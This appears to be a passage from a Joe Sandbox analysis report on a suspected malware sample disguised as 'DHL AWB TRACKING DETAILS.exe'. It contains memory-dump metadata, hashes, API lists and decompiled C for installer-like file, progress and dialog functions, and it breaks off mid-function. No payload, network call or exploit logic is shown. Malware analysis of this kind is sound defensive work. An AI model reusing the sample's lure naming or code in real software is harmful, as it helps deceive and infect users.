                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004066bb
                    0x004066b8

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                    • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                    • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                    • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x51030c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}












                    0x0040138a
                    0x004013fa
                    0x00401392
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                    • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                    • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                    • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                    0x00405760
                    0x0040576d
                    0x00405782
                    0x00405788

                    APIs
                    • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00405760
                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                    • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                    • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                    • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                    0x00405741
                    0x0040574a
                    0x00000000
                    0x00405753
                    0x00405759

                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                    • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x004031ac
                    0x004031bf
                    0x004031c7
                    0x00000000
                    0x004031ce
                    0x00000000
                    0x004031d0

                    APIs
                    • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                    • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                    0x004031e8
                    0x004031ee

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                    • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x50f930
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                    0x00404f6a
                    0x00404f70
                    0x00404f79
                    0x00404f7c
                    0x0040510d
                    0x00405114
                    0x00405138
                    0x00405138
                    0x0040513e
                    0x0040514b
                    0x00405169
                    0x00405169
                    0x00405170
                    0x004051c7
                    0x004051c7
                    0x004051cb
                    0x00000000
                    0x00000000
                    0x004051cd
                    0x004051d0
                    0x00000000
                    0x00000000
                    0x004051da
                    0x004051e0
                    0x004051e2
                    0x004051e5
                    0x004052de
                    0x00000000
                    0x004052de
                    0x004051f4
                    0x00405200
                    0x00405206
                    0x00405209
                    0x0040520c
                    0x00405221
                    0x00405224
                    0x00405224
                    0x00405227
                    0x0040520e
                    0x00405213
                    0x00405219
                    0x0040521c
                    0x0040521c
                    0x00405237
                    0x0040523f
                    0x00405240
                    0x00405242
                    0x0040524b
                    0x0040524e
                    0x00405255
                    0x0040525c
                    0x00405264
                    0x00405264
                    0x00405272
                    0x00405278
                    0x0040527b
                    0x0040527b
                    0x00405282
                    0x00405288
                    0x00405291
                    0x00405298
                    0x004052a1
                    0x004052a3
                    0x004052a6
                    0x004052b5
                    0x004052b7
                    0x004052bd
                    0x004052be
                    0x004052bf
                    0x004052bf
                    0x004052c7
                    0x004052d2
                    0x004052d8
                    0x004052d8
                    0x00000000
                    0x00405242
                    0x00405172
                    0x00405178
                    0x004051a8
                    0x004051aa
                    0x004051b0
                    0x004051b2
                    0x004051bb
                    0x004051bb
                    0x004051c2
                    0x00000000
                    0x004051c2
                    0x0040517c
                    0x00405186
                    0x00000000
                    0x0040514d
                    0x0040514d
                    0x00405153
                    0x0040518b
                    0x00000000
                    0x00405194
                    0x0040515c
                    0x00405161
                    0x00405164
                    0x00000000
                    0x00405164
                    0x0040514b
                    0x00404f82
                    0x00404f86
                    0x00404f8f
                    0x00404f96
                    0x00404f99
                    0x00404f9c
                    0x00404f9f
                    0x00404fa0
                    0x00404fa1
                    0x00404fba
                    0x00404fbd
                    0x00404fc7
                    0x00404fd6
                    0x00404fde
                    0x00404fe6
                    0x00404feb
                    0x00404fee
                    0x00404ffa
                    0x00405003
                    0x0040500c
                    0x0040502f
                    0x00405035
                    0x00405046
                    0x0040504b
                    0x00405059
                    0x00405067
                    0x00405067
                    0x0040506c
                    0x0040507a
                    0x0040507a
                    0x0040507f
                    0x00405082
                    0x00405087
                    0x00405093
                    0x0040509c
                    0x004050a9
                    0x004050b8
                    0x004050ab
                    0x004050b0
                    0x004050b0
                    0x004050c4
                    0x004050c4
                    0x004050d8
                    0x004050e1
                    0x004050ea
                    0x004050fa
                    0x00405106
                    0x00405106
                    0x00000000

                    APIs
                    • GetDlgItem.USER32 ref: 00404FC0
                    • GetDlgItem.USER32 ref: 00404FCF
                    • GetClientRect.USER32 ref: 0040500C
                    • GetSystemMetrics.USER32 ref: 00405014
                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                    • ShowWindow.USER32(?,00000008), ref: 004050B0
                    • GetDlgItem.USER32 ref: 004050D1
                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                    • GetDlgItem.USER32 ref: 00404FDE
                      • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                    • GetDlgItem.USER32 ref: 00405123
                    • CreateThread.KERNEL32 ref: 00405131
                    • CloseHandle.KERNEL32(00000000), ref: 00405138
                    • ShowWindow.USER32(00000000), ref: 0040515C
                    • ShowWindow.USER32(00000000,00000008), ref: 00405161
                    • ShowWindow.USER32(00000008), ref: 004051A8
                    • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                    • CreatePopupMenu.USER32 ref: 004051EB
                    • AppendMenuA.USER32 ref: 00405200
                    • GetWindowRect.USER32 ref: 00405213
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                    • OpenClipboard.USER32(00000000), ref: 00405282
                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                    • GlobalLock.KERNEL32 ref: 0040529B
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                    • SetClipboardData.USER32 ref: 004052D2
                    • CloseClipboard.USER32 ref: 004052D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                    • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                    • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                    • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x50fadc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x50f930
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
